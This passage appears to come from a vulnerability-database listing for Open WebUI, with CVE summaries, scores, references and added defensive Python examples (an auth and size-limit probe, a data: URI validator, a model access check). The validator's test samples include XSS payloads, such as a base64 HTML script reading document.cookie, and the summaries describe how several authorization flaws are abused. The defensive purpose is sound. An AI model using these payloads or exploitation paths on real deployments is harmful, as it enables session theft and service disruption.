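        except (ValueError, KeyError, TypeError):
            self._reply(HTTPStatus.BAD_REQUEST)
            return
        # A real handler renders the PDF here; the example only acknowledges the job.
        self._reply(HTTPStatus.OK, json.dumps({"rendered": title}).encode())


def probe(host: str, port: int, body: bytes, token: Optional[str] = None,
          declared_length: Optional[int] = None) -> int:
    """Send one raw POST and return the status code; declared_length lets the
    probe claim a body far larger than it sends, as an abuser would."""
    headers = [
        "POST /api/v1/utils/pdf HTTP/1.1",
        f"Host: {host}:{port}",
        "Connection: close",
        "Content-Type: application/json",
        f"Content-Length: {len(body) if declared_length is None else declared_length}",
    ]
    if token is not None:
        headers.append(f"Authorization: Bearer {token}")
    raw = ("\r\n".join(headers) + "\r\n\r\n").encode() + body
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(raw)
        response = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            response += chunk
    return int(response.split(b" ", 2)[1])


def run_checks() -> Dict[str, int]:
    """Start the endpoint, run the three probes a reviewer wants, shut it down."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), PdfHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address[:2]
    body = json.dumps({"title": "Chat export"}).encode()
    try:
        return {
            "anonymous": probe(host, port, body),
            "oversized": probe(host, port, body, API_TOKEN, declared_length=MAX_BODY_BYTES + 1),
            "legit": probe(host, port, body, API_TOKEN),
        }
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_checks())   # {'anonymous': 401, 'oversized': 413, 'legit': 200}
```

The order matters: the size check runs on the declared Content-Length, so a flood of oversized requests is refused without buffering any of them, and the authentication check runs before that, so an anonymous caller never even reaches the size check. In a framework such as FastAPI the same two steps are an auth dependency on the route and a body-size limit enforced by middleware or the reverse proxy in front of it.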
5
url VCID-2rs8-62x1-s7h7
vulnerability_id VCID-2rs8-62x1-s7h7
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, the profile_image_url field on the user profile update form accepted arbitrary data: URI values without MIME-type validation, resulting in an XSS vulnerability. This vulnerability is fixed in 0.8.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45299
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01751
published_at 2026-06-12T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01762
published_at 2026-06-14T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01747
published_at 2026-06-11T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01755
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45299
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45299
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45299
4
reference_url https://github.com/advisories/GHSA-6gh2-q7cp-9qf6
reference_id GHSA-6gh2-q7cp-9qf6
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6gh2-q7cp-9qf6
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-6gh2-q7cp-9qf6
reference_id GHSA-6gh2-q7cp-9qf6
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:20:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-6gh2-q7cp-9qf6
fixed_packages
0
url pkg:pypi/open-webui@0.8.0
purl pkg:pypi/open-webui@0.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4rz6-hw32-jueb
7
vulnerability VCID-4v8w-kv6g-kkbc
8
vulnerability VCID-4x63-8x64-d3bq
9
vulnerability VCID-5319-t7jm-y3bx
10
vulnerability VCID-5jna-wvd7-j7cm
11
vulnerability VCID-5wfg-zqcy-c7ar
12
vulnerability VCID-5wzn-mfwg-ybc3
13
vulnerability VCID-6rbm-rm25-hqgy
14
vulnerability VCID-7nbc-ng1s-suck
15
vulnerability VCID-8n6u-wgz9-1bgj
16
vulnerability VCID-8nzh-cpda-dkca
17
vulnerability VCID-8y4k-pj2n-8uhm
18
vulnerability VCID-chug-ma8r-cucc
19
vulnerability VCID-cw4k-3s8z-uqh8
20
vulnerability VCID-dz6g-jgmg-wqce
21
vulnerability VCID-dzh3-rqx4-fqhv
22
vulnerability VCID-ef1t-pxjm-j7cz
23
vulnerability VCID-hj5f-yk3y-ffdg
24
vulnerability VCID-jfs9-dps1-27a2
25
vulnerability VCID-k9jf-5jzd-pkge
26
vulnerability VCID-n4ma-zcpv-5fbp
27
vulnerability VCID-nxvm-97r4-6ybz
28
vulnerability VCID-pkds-1xgn-q3bv
29
vulnerability VCID-pwsg-72yy-quhk
30
vulnerability VCID-q682-k826-efhv
31
vulnerability VCID-qgfh-7u8n-y7c7
32
vulnerability VCID-qjt1-zxx8-r7ht
33
vulnerability VCID-r7vt-4bqm-f7hb
34
vulnerability VCID-reqw-pfm8-c7g5
35
vulnerability VCID-rhhj-rccv-87hw
36
vulnerability VCID-s625-eg1w-gfd1
37
vulnerability VCID-t571-d65a-cyb2
38
vulnerability VCID-u25g-p4nx-gqd1
39
vulnerability VCID-ujye-g4rj-8be5
40
vulnerability VCID-um53-kf7u-kkg6
41
vulnerability VCID-vghe-uuzj-m7cu
42
vulnerability VCID-vkx3-71kv-sugt
43
vulnerability VCID-w2vd-r3hr-w3bt
44
vulnerability VCID-wb88-83cj-ffhy
45
vulnerability VCID-wcz4-vwx4-tufb
46
vulnerability VCID-yug9-shts-kufb
47
vulnerability VCID-yysb-dk2k-f7g4
48
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0
aliases CVE-2026-45299, GHSA-6gh2-q7cp-9qf6
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2rs8-62x1-s7h7
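The MIME-type validation the advisory above says was missing, as an added example that is not part of this page or of Open WebUI's code: a profile_image_url that is a data: URI is accepted only for raster image types, only with a base64 payload, and only when the decoded bytes carry that type's magic number, so data:text/html and data:image/svg+xml values (a browser will run script from either) are rejected. The size limit, the handling of https URLs and paths, and the sample values are constructed for the illustration.

```python
"""Added example, not Open WebUI's own code: allowlist validation of a
profile_image_url that may be a data: URI."""

import base64
import binascii
import re
from typing import Optional

# Raster formats only. SVG is XML and can carry <script>, so it is deliberately absent.
IMAGE_SIGNATURES = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
    "image/webp": b"RIFF",           # plus "WEBP" at offset 8, checked below
}
MAX_IMAGE_BYTES = 512 * 1024         # assumption for the example: avatars stay small

_DATA_URI = re.compile(r"^data:([a-z0-9.+-]+/[a-z0-9.+-]+)(;[^,]*)?,(.*)$", re.I | re.S)


def _looks_like(mime: str, raw: bytes) -> bool:
    if not raw.startswith(IMAGE_SIGNATURES[mime]):
        return False
    return mime != "image/webp" or raw[8:12] == b"WEBP"


def validate_profile_image(value: str) -> Optional[str]:
    """Return None when `value` is acceptable, otherwise the reason it was rejected."""
    value = value.strip()
    # Absolute https URLs and same-origin paths pass; "//host/x" is protocol-relative
    # and points at another origin, so it is not treated as a path.
    if value.startswith("https://") or (value.startswith("/") and not value.startswith("//")):
        return None
    match = _DATA_URI.match(value)
    if not match:
        return "not an https URL, a same-origin path or a data: URI"
    mime = match.group(1).lower()
    params = (match.group(2) or "").lower().split(";")
    if mime not in IMAGE_SIGNATURES:
        return f"disallowed media type {mime}"
    if "base64" not in params:
        return "data: image must be base64 encoded"
    try:
        raw = base64.b64decode(match.group(3), validate=True)
    except (binascii.Error, ValueError):
        return "payload is not valid base64"
    if len(raw) > MAX_IMAGE_BYTES:
        return f"image exceeds {MAX_IMAGE_BYTES} bytes"
    if not _looks_like(mime, raw):
        return f"payload does not look like {mime}"
    return None


# Constructed samples. TINY_PNG carries only the PNG signature, which is all the check needs.
TINY_PNG = "data:image/png;base64," + base64.b64encode(IMAGE_SIGNATURES["image/png"] + b"\0" * 16).decode()
HTML_PAYLOAD = "data:text/html;base64," + base64.b64encode(b"<script>alert(document.cookie)</script>").decode()
SVG_PAYLOAD = "data:image/svg+xml,<svg onload=alert(1)></svg>"
MISLABELED = "data:image/png;base64," + base64.b64encode(b"<html><script>alert(1)</script></html>").decode()

if __name__ == "__main__":
    for sample in (TINY_PNG, HTML_PAYLOAD, SVG_PAYLOAD, MISLABELED, "javascript:alert(1)"):
        print(sample[:40].ljust(40), "->", validate_profile_image(sample) or "accepted")
```

The magic-number check is what makes the media type meaningful: without it, `data:image/png;base64,...` carrying HTML would pass a label-only filter. A Content-Security-Policy that forbids `data:` in `script-src` and `frame-src` is the defence in depth for the case where validation is bypassed.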
6
url VCID-2xdz-v8cw-fygv
vulnerability_id VCID-2xdz-v8cw-fygv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /responses endpoint in the OpenAI router accepts any authenticated user and forwards requests directly to upstream LLM providers without enforcing per-model access control. While the primary chat completion endpoint (generate_chat_completion) checks model ownership, group membership, and AccessGrants before allowing a request, the /responses proxy only validates that the user has a valid session via get_verified_user. This allows any authenticated user to interact with any model configured on the instance by sending a POST request to /api/openai/responses with an arbitrary model ID. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44556
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02545
published_at 2026-06-13T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.02551
published_at 2026-06-11T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02555
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44556
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/pull/23481
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/pull/23481
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44556
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44556
4
reference_url https://github.com/advisories/GHSA-hp5m-24vp-vq2q
reference_id GHSA-hp5m-24vp-vq2q
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hp5m-24vp-vq2q
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hp5m-24vp-vq2q
reference_id GHSA-hp5m-24vp-vq2q
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:15:01Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hp5m-24vp-vq2q
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44556, GHSA-hp5m-24vp-vq2q
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2xdz-v8cw-fygv
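The pattern behind the /responses bypass described above, as an added example that is not part of this page or of Open WebUI's code: one model access check, consulted by every route that proxies to an upstream provider, so a newer route cannot silently skip the ownership, group and grant rules the chat completion route applies. The ACL fields, the admin role, and the sample users and models are assumptions made for the illustration.

```python
"""Added example, not Open WebUI's own code: a shared model access check that
every proxy route calls, with the pre-fix session-only route for contrast."""

from dataclasses import dataclass, field
from typing import Dict, FrozenSet, Set


@dataclass(frozen=True)
class User:
    id: str
    role: str = "user"                  # "admin" bypasses the ACL
    groups: FrozenSet[str] = frozenset()


@dataclass
class Model:
    id: str
    owner_id: str
    public: bool = False
    group_grants: Set[str] = field(default_factory=set)   # groups allowed to use it
    user_grants: Set[str] = field(default_factory=set)    # individual users allowed


class ModelAccessDenied(PermissionError):
    pass


def can_access_model(user: User, model: Model) -> bool:
    """The one place the ownership / group / grant rules live."""
    return (
        user.role == "admin"
        or model.public
        or model.owner_id == user.id
        or user.id in model.user_grants
        or bool(user.groups & model.group_grants)
    )


class ModelRouter:
    def __init__(self, models: Dict[str, Model]) -> None:
        self.models = models

    def _authorized_model(self, user: User, model_id: str) -> Model:
        model = self.models.get(model_id)
        # Unknown and forbidden ids get the same answer, so the route cannot be
        # used to enumerate which model ids are configured.
        if model is None or not can_access_model(user, model):
            raise ModelAccessDenied(model_id)
        return model

    def chat_completions(self, user: User, body: dict) -> str:
        model = self._authorized_model(user, body["model"])
        return f"upstream:chat:{model.id}"

    def responses(self, user: User, body: dict) -> str:
        model = self._authorized_model(user, body["model"])    # same guard as chat
        return f"upstream:responses:{model.id}"

    def responses_pre_fix(self, user: User, body: dict) -> str:
        """Pre-0.9.0 shape: a verified session was the only check."""
        return f"upstream:responses:{self.models[body['model']].id}"


# Constructed fixture: one restricted model, one public model, two ordinary users.
MODELS = {
    "gpt-internal": Model("gpt-internal", owner_id="admin1", group_grants={"research"}),
    "assistant": Model("assistant", owner_id="admin1", public=True),
}
ROUTER = ModelRouter(MODELS)
ALICE = User("alice", groups=frozenset({"research"}))
BOB = User("bob")


def route_outcomes(user: User, model_id: str) -> Dict[str, str]:
    """Call each route as `user` with an arbitrary model id and report allow/deny."""
    routes = {"chat": ROUTER.chat_completions, "responses": ROUTER.responses,
              "responses_pre_fix": ROUTER.responses_pre_fix}
    outcome = {}
    for name, route in routes.items():
        try:
            route(user, {"model": model_id, "input": "hello"})
            outcome[name] = "allow"
        except (ModelAccessDenied, KeyError):
            outcome[name] = "deny"
    return outcome


if __name__ == "__main__":
    print("bob/gpt-internal  :", route_outcomes(BOB, "gpt-internal"))
    print("alice/gpt-internal:", route_outcomes(ALICE, "gpt-internal"))
```

The useful review habit this encodes: whenever a new route forwards a model id upstream, grep for the shared guard in it, because a dependency that only proves the session is valid (the get_verified_user shape named in the summary) proves nothing about the model.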
7
url VCID-32yb-vsfs-43a8
vulnerability_id VCID-32yb-vsfs-43a8
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the is_user_channel_member function checks whether a ChannelMember row exists but does not check the is_active field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with is_active=False and status='left'. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44561
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.10682
published_at 2026-06-12T12:55:00Z
1
value 0.00034
scoring_system epss
scoring_elements 0.1066
published_at 2026-06-14T12:55:00Z
2
value 0.00034
scoring_system epss
scoring_elements 0.10624
published_at 2026-06-11T12:55:00Z
3
value 0.00034
scoring_system epss
scoring_elements 0.10683
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44561
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44561
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44561
3
reference_url https://github.com/advisories/GHSA-hmgr-67hw-j2cq
reference_id GHSA-hmgr-67hw-j2cq
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hmgr-67hw-j2cq
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq
reference_id GHSA-hmgr-67hw-j2cq
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T20:21:40Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hmgr-67hw-j2cq
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44561, GHSA-hmgr-67hw-j2cq
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-32yb-vsfs-43a8
8
url VCID-3436-znsq-guds
vulnerability_id VCID-3436-znsq-guds
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45399
reference_id
reference_type
scores
0
value 0.00043
scoring_system epss
scoring_elements 0.13781
published_at 2026-06-14T12:55:00Z
1
value 0.00043
scoring_system epss
scoring_elements 0.13694
published_at 2026-06-11T12:55:00Z
2
value 0.00043
scoring_system epss
scoring_elements 0.1381
published_at 2026-06-13T12:55:00Z
3
value 0.00043
scoring_system epss
scoring_elements 0.13811
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45399
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/e7ff4768f8ffe1924b4576381c9e45e8a64350e4
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/e7ff4768f8ffe1924b4576381c9e45e8a64350e4
3
reference_url https://github.com/open-webui/open-webui/pull/23454
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/pull/23454
4
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45399
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45399
6
reference_url https://github.com/advisories/GHSA-8jjp-r2w2-4v22
reference_id GHSA-8jjp-r2w2-4v22
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8jjp-r2w2-4v22
7
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22
reference_id GHSA-8jjp-r2w2-4v22
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T19:42:08Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45399, GHSA-8jjp-r2w2-4v22
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3436-znsq-guds
9
url VCID-3hv8-ys1d-63a6
vulnerability_id VCID-3hv8-ys1d-63a6
summary In version v0.3.32 of open-webui/open-webui, the application allows users to submit large payloads in the email and password fields during the sign-in process due to the lack of character length validation on these inputs. This vulnerability can lead to a Denial of Service (DoS) condition when a user submits excessively large strings, exhausting server resources such as CPU, memory, and disk space, and rendering the service unavailable for legitimate users. This makes the server susceptible to resource exhaustion attacks without requiring authentication.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-12534
reference_id
reference_type
scores
0
value 0.00618
scoring_system epss
scoring_elements 0.70548
published_at 2026-06-13T12:55:00Z
1
value 0.00618
scoring_system epss
scoring_elements 0.70545
published_at 2026-06-14T12:55:00Z
2
value 0.00618
scoring_system epss
scoring_elements 0.70443
published_at 2026-06-11T12:55:00Z
3
value 0.00618
scoring_system epss
scoring_elements 0.70534
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-12534
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/auths/index.ts#L113-L142
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/e8babe62bc8e466be0367703fd062a981f5c2394/src/lib/apis/auths/index.ts#L113-L142
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-12534
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-12534
4
reference_url https://huntr.com/bounties/c7c0a4e6-acd3-49b4-8684-2c2c27014b76
reference_id c7c0a4e6-acd3-49b4-8684-2c2c27014b76
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-20T17:50:33Z/
url https://huntr.com/bounties/c7c0a4e6-acd3-49b4-8684-2c2c27014b76
5
reference_url https://github.com/advisories/GHSA-g3mx-83mp-3rwc
reference_id GHSA-g3mx-83mp-3rwc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g3mx-83mp-3rwc
fixed_packages
0
url pkg:pypi/open-webui@0.3.33.dev1
purl pkg:pypi/open-webui@0.3.33.dev1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
